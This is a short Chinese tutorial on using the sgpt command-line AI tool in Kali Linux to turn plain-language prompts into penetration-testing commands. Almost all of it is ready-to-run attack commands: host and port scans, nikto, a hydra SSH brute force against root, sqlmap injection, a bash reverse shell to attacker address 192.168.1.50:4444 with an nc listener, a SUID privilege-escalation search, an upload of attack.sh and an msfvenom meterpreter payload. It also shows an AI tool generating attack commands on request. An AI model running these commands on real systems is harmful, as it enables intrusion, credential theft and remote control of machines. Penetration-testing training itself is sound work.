sgpt在kali应用
Kali Linux 下 sgpt 渗透测试相关案例
1. 扫描目标主机存活
sgpt -s "使用 nmap 扫描 192.168.1.100 是否存活"
示例命令:
nmap -sn 192.168.1.100
2. 扫描目标主机开放端口和服务
sgpt -s "使用 nmap 扫描 192.168.1.100 常见端口和服务"
示例命令:
nmap -sV -p 1-1000 192.168.1.100
3. 使用 nikto 扫描 Web 服务器漏洞
sgpt -s "使用 nikto 扫描 http://192.168.1.100 的漏洞"
示例命令:
nikto -h http://192.168.1.100
4. 利用 hydra 进行 SSH 爆破(用户名:root,密码字典:/usr/share/wordlists/rockyou.txt)
sgpt -s "用 hydra 对 192.168.1.100 的 ssh 端口进行爆破,用户名 root"
示例命令:
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
5. 使用 sqlmap 对目标 URL 进行注入测试
sgpt -s "使用 sqlmap 对 http://192.168.1.100/vuln.php?id=1 进行 SQL 注入测试"
示例命令:
sqlmap -u "http://192.168.1.100/vuln.php?id=1" --batch
6. 反向连接到攻击机的 shell (假设攻击机 IP 为 192.168.1.50,端口 4444)
sgpt -s "生成一个 bash 反向 shell 脚本,连接到 192.168.1.50 的 4444 端口"
示例命令:
bash -i >& /dev/tcp/192.168.1.50/4444 0>&1
7. 使用 netcat 监听本地端口等待连接
sgpt -s "使用 nc 监听本地 4444 端口,等待反向 shell 连接"
示例命令:
nc -lvnp 4444
8. 查找具有 SUID 权限的文件,寻找提权机会
sgpt -s "查找系统中所有具有 SUID 权限的文件"
示例命令:
find / -perm -4000 -type f 2>/dev/null
9. 使用 curl 上传文件到目标服务器
sgpt -s "用 curl 命令上传 attack.sh 文件到 http://192.168.1.100/upload"
示例命令:
curl -F "file=@attack.sh" http://192.168.1.100/upload
10. 利用 msfconsole 生成 payload
sgpt -s "用 msfvenom 生成 windows/meterpreter/reverse_tcp 负载,连接回 192.168.1.50 端口 4444"
示例命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
总结
- 利用 sgpt 只需输入自然语言描述,即可快速生成渗透测试中常用命令,大大提升效率。
- 以上案例适合 Kali Linux 上的日常渗透测试流程。
- 建议结合 sgpt 输出命令自行审核,确保合规和安全。